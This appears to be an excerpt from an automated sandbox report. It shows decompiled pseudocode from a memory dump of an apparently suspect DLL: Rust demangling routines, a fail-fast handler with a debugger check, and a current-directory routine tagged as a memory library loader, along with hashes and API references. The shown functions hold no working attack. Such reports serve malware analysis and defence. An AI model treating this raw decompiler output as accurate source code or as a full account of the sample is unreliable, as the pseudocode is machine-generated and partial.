																		__eflags = _t292 - _t222;
																		_t313[3] = _t222;
																		if(_t292 >= _t222) {
																			L53:
																			__eflags = _t157;
																			if(_t157 == 0) {
																				L67:
																				_t204 = 0;
																				goto L72;
																			} else {
																				_t313[1] = 0x56;
																				_t258 = 0;
																				__eflags = _t292 - _t313[3];
																				_t204 = 0;
																				 *_t313 = _t292;
																				if(_t292 >= _t313[3]) {
																					goto L72;
																				} else {
																					_t313[2] = _t157;
																					_t225 = 0;
																					__eflags = 0;
																					_t307 =  *_t313 + 1;
																					_t164 = _t313[2];
																					asm("o16 nop [cs:eax+eax]");
																					while(1) {
																						_t165 =  *(_t164 + _t307 - 1) & 0x000000ff;
																						__eflags = _t165 - 0x5f;
																						if(_t165 == 0x5f) {
																							break;
																						}
																						_t207 = _t165 + 0xd0;
																						__eflags = _t207 - 0xa;
																						if(__eflags < 0) {
																							L63:
																							_t295 = _t282;
																							 *(_t282 + 0xc) = _t307;
																							_t170 = _t225;
																							_t208 = _t207 & 0xffffff00 | __eflags > 0x00000000;
																							_t171 = _t170 * 0x3e;
																							_t258 = (_t170 * 0x3e >> 0x20) + _t258 * 0x3e;
																							if(__eflags != 0) {
																								_t204 = 0;
																								__eflags = 0;
																								goto L71;
																							} else {
																								_t204 = 0;
																								_t225 = _t171 + (_t208 & 0x000000ff);
																								__eflags = _t225;
																								asm("adc edx, 0x0");
																								if(_t225 < 0) {
																									L71:
																									_t282 = _t295;
																									goto L72;
																								} else {
																									__eflags = _t313[3] - _t307;
																									_t164 = _t313[2];
																									_t307 = _t307 + 1;
																									_t282 = _t295;
																									if(__eflags != 0) {
																										continue;
																									} else {
																										goto L72;
																									}
																								}
																							}
																						} else {
																							_t173 = _t165 + 0x9f;
																							__eflags = _t173 - 0x1a;
																							if(__eflags >= 0) {
																								_t175 = _t173 + 0xbf;
																								__eflags = _t175 - 0x1a;
																								if(_t175 >= 0x1a) {
																									goto L67;
																								} else {
																									_t176 = _t175 + 0xe3;
																									__eflags = _t176;
																									goto L62;
																								}
																							} else {
																								_t176 = _t173 + 0xa9;
																								L62:
																								_t207 = _t176;
																								goto L63;
																							}
																						}
																						goto L76;
																					}
																					_t204 = 0;
																					_t226 = _t225 + 1;
																					__eflags = _t226;
																					 *(_t282 + 0xc) = _t307;
																					asm("adc edx, 0x0");
																					if(_t226 < 0) {
																						goto L72;
																					} else {
																						_t292 =  *_t313;
																						goto L49;
																					}
																				}
																			}
																		} else {
																			__eflags = _t157;
																			if(_t157 == 0) {
																				goto L53;
																			} else {
																				__eflags =  *((char*)(_t157 + _t292)) - 0x5f;
																				if( *((char*)(_t157 + _t292)) != 0x5f) {
																					goto L53;
																				} else {
																					_t313[1] = 0x56;
																					_t226 = 0;
																					__eflags = 0;
																					 *(_t282 + 0xc) = _t292 + 1;
																					L49:
																					_t204 = 0;
																					__eflags = _t226 - _t292 - 1;
																					asm("sbb edx, 0x0");
																					if(_t226 >= _t292 - 1) {
																						L72:
																						_t223 =  *(_t282 + 0x14);
																						__eflags =  *(_t282 + 0x14);
																						if( *(_t282 + 0x14) == 0) {
																							L74:
																							 *_t282 = 1;
																							 *(_t282 + 1) = _t204;
																							goto L75;
																						} else {
																							__eflags = _t204;
																							_t257 =  !=  ? "{recursion limit reached}{invalid syntax}" :  &M6E4ECB85;
																							_push((_t204 & 0x000000ff) + 0x10 + (_t204 & 0x000000ff) * 8);
																							_t162 = E6E4A1DE0(_t223,  !=  ? "{recursion limit reached}{invalid syntax}" :  &M6E4ECB85);
																							_t313 =  &(_t313[1]);
																							_t158 = 1;
																							__eflags = _t162;
																							if(_t162 == 0) {
																								goto L74;
																							}
																						}
																					} else {
																						_t204 = 1;
																						_t167 =  *(_t282 + 0x10) + 1;
																						__eflags = _t167 - 0x1f4;
																						if(_t167 > 0x1f4) {
																							goto L72;
																						} else {
																							__eflags =  *(_t282 + 0x14);
																							if( *(_t282 + 0x14) == 0) {
																								goto L75;
																							} else {
																								asm("movsd xmm0, [edi]");
																								asm("movsd xmm1, [edi+0x8]");
																								 *_t282 = 0;
																								 *(_t282 + 0xc) = _t226;
																								 *(_t282 + 0x10) = _t167;
																								_t313[8] =  *(_t282 + 0x10);
																								__eflags = _t313[1];
																								asm("movsd [esp+0x18], xmm1");
																								asm("movsd [esp+0x10], xmm0");
																								_t158 = E6E4A6F50(_t282);
																								asm("movsd xmm0, [esp+0x10]");
																								asm("movsd xmm1, [esp+0x18]");
																								asm("movsd [edi], xmm0");
																								asm("movsd [edi+0x8], xmm1");
																								 *(_t282 + 0x10) = _t313[8];
																							}
																						}
																					}
																				}
																			}
																		}
																		goto L76;
																	} else {
																		_t232 =  *(_t282 + 0x14);
																		__eflags =  *(_t282 + 0x14);
																		if( *(_t282 + 0x14) == 0) {
																			L75:
																			_t158 = 0;
																			__eflags = 0;
																			L76:
																		} else {
																			_push(1);
																			_t158 = E6E4A1DE0(_t232, "?\'for<, >  as ::{shimclosure#[]dyn  + ; mut const  unsafe extern \"");
																		}
																	}
																	return _t158;
																}
															}
														}
													}
												} else {
													__eflags =  *((char*)(_t201 + _t291)) - 0xbf;
													if( *((char*)(_t201 + _t291)) <= 0xbf) {
														goto L38;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								}
								goto L78;
							}
						}
						goto L19;
					}
				} else {
					_t249 =  *((intOrPtr*)(__ecx + 0x14));
					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
						L22:
						_t215 = 0;
						__eflags = 0;
					} else {
						_push(1);
						_t215 = E6E4A1DE0(_t249, "?\'for<, >  as ::{shimclosure#[]dyn  + ; mut const  unsafe extern \"");
					}
					L23:
					return _t215;
				}
				L78:
			}








































































                          0x6e4a77b4
                          0x6e4a77b5
                          0x6e4a77d8
                          0x6e4a77dc
                          0x6e4a77df
                          0x6e4a77e3
                          0x6e4a77e7
                          0x6e4a77e9
                          0x6e4a7946
                          0x6e4a7946
                          0x6e4a794a
                          0x6e4a794d
                          0x6e4a794f
                          0x6e4a7966
                          0x6e4a7966
                          0x00000000
                          0x6e4a7951
                          0x6e4a7956
                          0x6e4a7958
                          0x6e4a7960
                          0x6e4a7962
                          0x6e4a7964
                          0x00000000
                          0x00000000
                          0x6e4a7964
                          0x00000000
                          0x6e4a77ef
                          0x6e4a77ef
                          0x6e4a77f3
                          0x6e4a77f6
                          0x6e4a77f9
                          0x6e4a77fb
                          0x6e4a77ff
                          0x6e4a7803
                          0x6e4a7811
                          0x6e4a7815
                          0x6e4a781a
                          0x6e4a781a
                          0x6e4a781b
                          0x6e4a7820
                          0x6e4a7823
                          0x6e4a7826
                          0x00000000
                          0x00000000
                          0x6e4a782e
                          0x6e4a7833
                          0x6e4a7836
                          0x6e4a7837
                          0x6e4a783a
                          0x6e4a783d
                          0x6e4a7840
                          0x00000000
                          0x6e4a7842
                          0x6e4a7844
                          0x6e4a7847
                          0x6e4a784a
                          0x00000000
                          0x6e4a784c
                          0x6e4a784c
                          0x6e4a784f
                          0x00000000
                          0x6e4a7855
                          0x6e4a7855
                          0x6e4a7859
                          0x6e4a785c
                          0x6e4a785e
                          0x6e4a7860
                          0x6e4a7b65
                          0x6e4a7b72
                          0x6e4a7b77
                          0x6e4a7b7a
                          0x00000000
                          0x6e4a7866
                          0x6e4a7866
                          0x6e4a7868
                          0x6e4a7874
                          0x6e4a7874
                          0x6e4a787a
                          0x6e4a787e
                          0x6e4a7882
                          0x6e4a7886
                          0x6e4a788b
                          0x6e4a7890
                          0x6e4a797b
                          0x6e4a797e
                          0x6e4a7980
                          0x00000000
                          0x6e4a7982
                          0x6e4a7989
                          0x6e4a798b
                          0x6e4a7990
                          0x6e4a7993
                          0x6e4a7995
                          0x6e4a7997
                          0x00000000
                          0x6e4a7999
                          0x6e4a799d
                          0x6e4a799e
                          0x6e4a79a3
                          0x6e4a79a5
                          0x00000000
                          0x6e4a79a5
                          0x6e4a7997
                          0x6e4a7896
                          0x6e4a789a
                          0x6e4a789d
                          0x6e4a789f
                          0x00000000
                          0x6e4a78a5
                          0x6e4a78a5
                          0x6e4a78a9
                          0x6e4a78ad
                          0x6e4a78b1
                          0x6e4a78b8
                          0x6e4a78bb
                          0x6e4a79aa
                          0x6e4a78c1
                          0x6e4a78c1
                          0x6e4a78c6
                          0x6e4a78d0
                          0x6e4a78d0
                          0x6e4a78d6
                          0x6e4a78e8
                          0x6e4a78f3
                          0x6e4a7904
                          0x6e4a7919
                          0x6e4a7922
                          0x6e4a7924
                          0x6e4a7928
                          0x6e4a792a
                          0x6e4a793a
                          0x6e4a793f
                          0x6e4a793f
                          0x6e4a7944
                          0x6e4a79af
                          0x6e4a79b3
                          0x6e4a79b6
                          0x6e4a79b8
                          0x6e4a79c6
                          0x6e4a79d9
                          0x6e4a79de
                          0x6e4a79de
                          0x6e4a79de
                          0x6e4a79e1
                          0x6e4a79e4
                          0x6e4a79f7
                          0x6e4a79fc
                          0x6e4a79fc
                          0x6e4a79e6
                          0x6e4a79e8
                          0x6e4a79ec
                          0x6e4a79ec
                          0x6e4a7a0d
                          0x6e4a7a11
                          0x6e4a7a12
                          0x6e4a7a14
                          0x6e4a7a15
                          0x6e4a7a17
                          0x6e4a7a1c
                          0x6e4a7a1f
                          0x6e4a7a21
                          0x6e4a7a21
                          0x6e4a7a23
                          0x00000000
                          0x6e4a7a29
                          0x6e4a7a29
                          0x6e4a7a2c
                          0x00000000
                          0x6e4a7a32
                          0x6e4a7a36
                          0x6e4a7a39
                          0x6e4a7a3c
                          0x6e4a7a42
                          0x6e4a7a50
                          0x6e4a7a55
                          0x6e4a7a5c
                          0x6e4a7a5c
                          0x6e4a7b7c
                          0x6e4a7b7c
                          0x6e4a7b8b
                          0x6e4a7b90
                          0x6e4a7b93
                          0x6e4a7b98
                          0x6e4a7b9b
                          0x6e4a7ba1
                          0x6e4a7ba9
                          0x6e4a7bab
                          0x6e4a7bb7
                          0x6e4a7bbb
                          0x6e4a7bc3
                          0x6e4a7bc5
                          0x6e4a7bc7
                          0x6e4a7bcb
                          0x6e4a7bcf
                          0x6e4a7bd1
                          0x6e4a7bd3
                          0x6e4a7bd6
                          0x6e4a7bd8
                          0x6e4a7bdc
                          0x6e4a7be1
                          0x6e4a7be3
                          0x6e4a7be6
                          0x6e4a7be8
                          0x6e4a7be9
                          0x6e4a7beb
                          0x6e4a7bee
                          0x6e4a7bee
                          0x6e4a7bf0
                          0x6e4a7bf4
                          0x6e4a7bf6
                          0x6e4a7bf8
                          0x6e4a7bf8
                          0x6e4a7bf8
                          0x6e4a7bfb
                          0x6e4a7bfb
                          0x6e4a7bfb
                          0x6e4a7c01
                          0x6e4a7c02
                          0x6e4a7c03
                          0x6e4a7c04
                          0x6e4a7c07
                          0x6e4a7c0a
                          0x6e4a7c0c
                          0x6e4a7c2d
                          0x6e4a7c30
                          0x6e4a7c33
                          0x6e4a7c36
                          0x6e4a7c38
                          0x6e4a7c3c
                          0x6e4a7ce2
                          0x6e4a7ce2
                          0x6e4a7ce4
                          0x6e4a7da2
                          0x6e4a7da2
                          0x00000000
                          0x6e4a7cea
                          0x6e4a7cea
                          0x6e4a7cee
                          0x6e4a7cf0
                          0x6e4a7cf4
                          0x6e4a7cf9
                          0x6e4a7cfc
                          0x00000000
                          0x6e4a7d02
                          0x6e4a7d02
                          0x6e4a7d09
                          0x6e4a7d09
                          0x6e4a7d0b
                          0x6e4a7d0e
                          0x6e4a7d12
                          0x6e4a7d20
                          0x6e4a7d20
                          0x6e4a7d25
                          0x6e4a7d27
                          0x00000000
                          0x00000000
                          0x6e4a7d2b
                          0x6e4a7d2e
                          0x6e4a7d31
                          0x6e4a7d5e
                          0x6e4a7d65
                          0x6e4a7d67
                          0x6e4a7d73
                          0x6e4a7d75
                          0x6e4a7d78
                          0x6e4a7d7a
                          0x6e4a7d81
                          0x6e4a7dbb
                          0x6e4a7dbb
                          0x00000000
                          0x6e4a7d83
                          0x6e4a7d88
                          0x6e4a7d8a
                          0x6e4a7d8a
                          0x6e4a7d8c
                          0x6e4a7d8f
                          0x6e4a7dbd
                          0x6e4a7dbd
                          0x00000000
                          0x6e4a7d91
                          0x6e4a7d91
                          0x6e4a7d95
                          0x6e4a7d99
                          0x6e4a7d9c
                          0x6e4a7d9e
                          0x00000000
                          0x6e4a7da0
                          0x00000000
                          0x6e4a7da0
                          0x6e4a7d9e
                          0x6e4a7d8f
                          0x6e4a7d33
                          0x6e4a7d35
                          0x6e4a7d38
                          0x6e4a7d3b
                          0x6e4a7d52
                          0x6e4a7d55
                          0x6e4a7d58
                          0x00000000
                          0x6e4a7d5a
                          0x6e4a7d5a
                          0x6e4a7d5a
                          0x00000000
                          0x6e4a7d5a
                          0x6e4a7d3d
                          0x6e4a7d3d
                          0x6e4a7d5c
                          0x6e4a7d5c
                          0x00000000
                          0x6e4a7d5c
                          0x6e4a7d3b
                          0x00000000
                          0x6e4a7d31
                          0x6e4a7da6
                          0x6e4a7da8
                          0x6e4a7da8
                          0x6e4a7dab
                          0x6e4a7dae
                          0x6e4a7db1
                          0x00000000
                          0x6e4a7db3
                          0x6e4a7db3
                          0x00000000
                          0x6e4a7db3
                          0x6e4a7db1
                          0x6e4a7cfc
                          0x6e4a7c42
                          0x6e4a7c42
                          0x6e4a7c44
                          0x00000000
                          0x6e4a7c4a
                          0x6e4a7c4a
                          0x6e4a7c4e
                          0x00000000
                          0x6e4a7c54
                          0x6e4a7c54
                          0x6e4a7c5b
                          0x6e4a7c5d
                          0x6e4a7c5f
                          0x6e4a7c62
                          0x6e4a7c63
                          0x6e4a7c65
                          0x6e4a7c67
                          0x6e4a7c6a
                          0x6e4a7dbf
                          0x6e4a7dbf
                          0x6e4a7dc2
                          0x6e4a7dc4
                          0x6e4a7ded
                          0x6e4a7ded
                          0x6e4a7df0
                          0x00000000
                          0x6e4a7dc6
                          0x6e4a7dd0
                          0x6e4a7dd2
                          0x6e4a7ddc
                          0x6e4a7ddd
                          0x6e4a7de2
                          0x6e4a7de7
                          0x6e4a7de9
                          0x6e4a7deb
                          0x00000000
                          0x00000000
                          0x6e4a7deb
                          0x6e4a7c70
                          0x6e4a7c73
                          0x6e4a7c75
                          0x6e4a7c76
                          0x6e4a7c7b
                          0x00000000
                          0x6e4a7c81
                          0x6e4a7c81
                          0x6e4a7c85
                          0x00000000
                          0x6e4a7c8b
                          0x6e4a7c8e
                          0x6e4a7c92
                          0x6e4a7c97
                          0x6e4a7c9a
                          0x6e4a7c9f
                          0x6e4a7ca2
                          0x6e4a7ca8
                          0x6e4a7cad
                          0x6e4a7cb3
                          0x6e4a7cbc
                          0x6e4a7cc1
                          0x6e4a7cc7
                          0x6e4a7cd1
                          0x6e4a7cd5
                          0x6e4a7cda
                          0x6e4a7cda
                          0x6e4a7c85
                          0x6e4a7c7b
                          0x6e4a7c6a
                          0x6e4a7c4e
                          0x6e4a7c44
                          0x00000000
                          0x6e4a7c0e
                          0x6e4a7c0e
                          0x6e4a7c11
                          0x6e4a7c13
                          0x6e4a7df3
                          0x6e4a7df3
                          0x6e4a7df3
                          0x6e4a7df5
                          0x6e4a7c19
                          0x6e4a7c1e
                          0x6e4a7c20
                          0x6e4a7c25
                          0x6e4a7c13
                          0x6e4a7dfc
                          0x6e4a7dfc
                          0x6e4a7a2c
                          0x6e4a7a23
                          0x6e4a789f
                          0x6e4a786a
                          0x6e4a786a
                          0x6e4a786e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4a786e
                          0x6e4a7868
                          0x6e4a7860
                          0x6e4a784f
                          0x6e4a784a
                          0x00000000
                          0x6e4a7840
                          0x6e4a7820
                          0x00000000
                          0x6e4a7803
                          0x6e4a77b7
                          0x6e4a77b7
                          0x6e4a77bc
                          0x6e4a796b
                          0x6e4a796b
                          0x6e4a796b
                          0x6e4a77c2
                          0x6e4a77c7
                          0x6e4a77d1
                          0x6e4a77d1
                          0x6e4a796d
                          0x6e4a7976
                          0x6e4a7976
                          0x00000000

                          APIs
                          Strings
                          • bool, xrefs: 6E4A7A4B
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E4A77C2, 6E4A7C19
                          • called `Option::unwrap()` on a `None` value, xrefs: 6E4A7B7C
                          • {recursion limit reached}{invalid syntax}, xrefs: 6E4A7DC6
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
                          • API String ID: 3839614884-433696047
                          • Opcode ID: a6d5dac60218fdba1003f7a03aea49bcd60d006b6a9b70f33fc1a805d745c8c4
                          • Instruction ID: dcbdcd6c853f1c790e531d6924238e17834d42c56d93a6c34e405a5a0783d61d
                          • Opcode Fuzzy Hash: a6d5dac60218fdba1003f7a03aea49bcd60d006b6a9b70f33fc1a805d745c8c4
                          • Instruction Fuzzy Hash: B7E1027160C7418FD324CFB8C494B6ABBE1AF96324F14866FD5998B3D9D334A846C782
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BAB0C, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E6E4BAB0C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6E4BAC27(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6E4BC310(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6E4BC310(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6E4BAC27(_t49);
				}
				return _t49;
			}


































                          0x6e4bab0c
                          0x6e4bab0c
                          0x6e4bab0c
                          0x6e4bab20
                          0x6e4bab22
                          0x6e4bab25
                          0x6e4bab25
                          0x6e4bab29
                          0x6e4bab2e
                          0x6e4bab46
                          0x6e4bab4c
                          0x6e4bab52
                          0x6e4bab58
                          0x6e4bab5e
                          0x6e4bab64
                          0x6e4bab6a
                          0x6e4bab71
                          0x6e4bab78
                          0x6e4bab7f
                          0x6e4bab86
                          0x6e4bab8d
                          0x6e4bab94
                          0x6e4bab95
                          0x6e4bab9e
                          0x6e4baba4
                          0x6e4baba7
                          0x6e4babad
                          0x6e4babbc
                          0x6e4babc8
                          0x6e4babd3
                          0x6e4babda
                          0x6e4babe1
                          0x6e4babec
                          0x6e4babf4
                          0x6e4babfd
                          0x6e4babff
                          0x6e4bac02
                          0x6e4bac04
                          0x6e4bac0e
                          0x6e4bac16
                          0x6e4bac1c
                          0x00000000
                          0x6e4bac23
                          0x6e4bac26

                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E4BAB18
                          • IsDebuggerPresent.KERNEL32 ref: 6E4BABE4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E4BAC04
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6E4BAC0E
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 85dca97e5537c9384d5b4a6050391313495e17c0e3703eab9bf32ca10de780fb
                          • Instruction ID: 4e05cf6d285d3b36aabc77fd75477dfe7678a8f27c98d695a6e02a5539bc0dc0
                          • Opcode Fuzzy Hash: 85dca97e5537c9384d5b4a6050391313495e17c0e3703eab9bf32ca10de780fb
                          • Instruction Fuzzy Hash: B5311675D0531C9BDF50DFA4D989BCDBBB8AF08708F1044AAE50DAB240EB709A84DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4ADEE0, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451memorylibraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E4ADEE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
				void* _v16;
				char _v1456;
				void* __ebp;
				void _t191;
				void* _t194;
				long _t195;
				signed int _t200;
				void* _t201;
				void* _t204;
				void* _t205;
				long _t206;
				char _t208;
				void* _t217;
				void* _t218;
				void* _t221;
				void* _t227;
				void* _t229;
				void* _t233;
				void* _t235;
				void* _t241;
				void* _t243;
				void* _t244;
				void* _t246;
				void* _t250;
				void* _t252;
				long _t260;
				long _t262;
				void* _t263;
				void* _t264;
				char _t265;
				void* _t267;
				void* _t274;
				void* _t284;
				void* _t288;
				long _t291;
				WCHAR* _t293;
				void* _t294;
				WCHAR* _t304;
				long _t305;
				void* _t307;
				void* _t308;
				intOrPtr _t310;
				intOrPtr _t313;
				signed int _t315;
				intOrPtr _t317;
				void* _t318;
				void* _t322;
				void* _t324;

				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
				_t310 = _t317;
				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
				 *(_t310 + 0x5a8) = 0xffffffff;
				 *((intOrPtr*)(_t310 + 0x5a4)) = E6E4B3B90;
				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
				 *[fs:0x0] = _t310 + 0x5a0;
				_t191 =  *_a4;
				 *(_t310 + 0x28) = _t191;
				 *(_t310 + 0xe) = _t191;
				E6E4BC310(__edi, _t310 + 0x190, 0, 0x400);
				_t318 = _t317 + 0xc;
				_t194 =  *0x6e4ed0bc; // 0x2
				_t262 = 0x200;
				 *(_t310 + 0x24) = 0;
				 *(_t310 + 0x2c) = _t194;
				 *(_t310 + 0x30) = 0;
				 *(_t310 + 0x14) = _t194;
				 *(_t310 + 0x34) = 0;
				 *(_t310 + 0x10) = 0x200;
				if(0x200 >= 0x201) {
					L4:
					_t291 =  *(_t310 + 0x24);
					_t263 = _t262 - _t291;
					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
					if( *(_t310 + 0x30) - _t291 < _t263) {
						 *(_t310 + 0x5a8) = 0;
						_t274 = _t310 + 0x2c;
						E6E4C7370(_t274, _t291, _t263);
						_t318 = _t318 + 4;
						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
					}
					_t262 =  *(_t310 + 0x10);
					_t304 =  *(_t310 + 0x14);
					 *(_t310 + 0x34) = _t262;
					 *(_t310 + 0x24) = _t262;
					 *(_t310 + 0x20) = _t304;
					 *(_t310 + 0x1c) = _t262;
				} else {
					L7:
					_t304 = _t310 + 0x190;
					 *(_t310 + 0x1c) = 0x200;
					 *(_t310 + 0x20) = _t304;
				}
				L8:
				SetLastError(0);
				_t195 = GetCurrentDirectoryW(_t262, _t304);
				_t305 = _t195;
				if(_t195 != 0 || GetLastError() == 0) {
					if(_t305 != _t262 || GetLastError() != 0x7a) {
						__eflags = _t305 -  *(_t310 + 0x10);
						_t262 = _t305;
						if(_t305 <  *(_t310 + 0x10)) {
							_t292 =  *(_t310 + 0x1c);
							 *(_t310 + 0x5a8) = 0;
							__eflags = _t305 -  *(_t310 + 0x1c);
							if(__eflags > 0) {
								E6E4C6DB0(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6e4eded0);
								goto L70;
							} else {
								_t293 =  *(_t310 + 0x20);
								_t274 = _t310 + 0x70;
								_push(_t305);
								E6E4B0EC0(_t262, _t274, _t293, _t305, _t310);
								_t318 = _t318 + 4;
								asm("movsd xmm0, [esi+0x70]");
								_t264 = 0;
								 *(_t310 + 0x48) =  *(_t310 + 0x78);
								asm("movsd [esi+0x40], xmm0");
								_t200 =  *(_t310 + 0x30);
								__eflags = _t200;
								if(_t200 != 0) {
									goto L18;
								} else {
								}
								goto L21;
							}
						} else {
							__eflags = _t262 - 0x201;
							 *(_t310 + 0x10) = _t262;
							if(_t262 < 0x201) {
								goto L7;
							} else {
								goto L4;
							}
							goto L8;
						}
					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6e4fadc8, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6e4fadc8, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6e4fadc8, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6e4ed5c8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6e4ecd60;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6E4A2320( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6e4fadc8, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
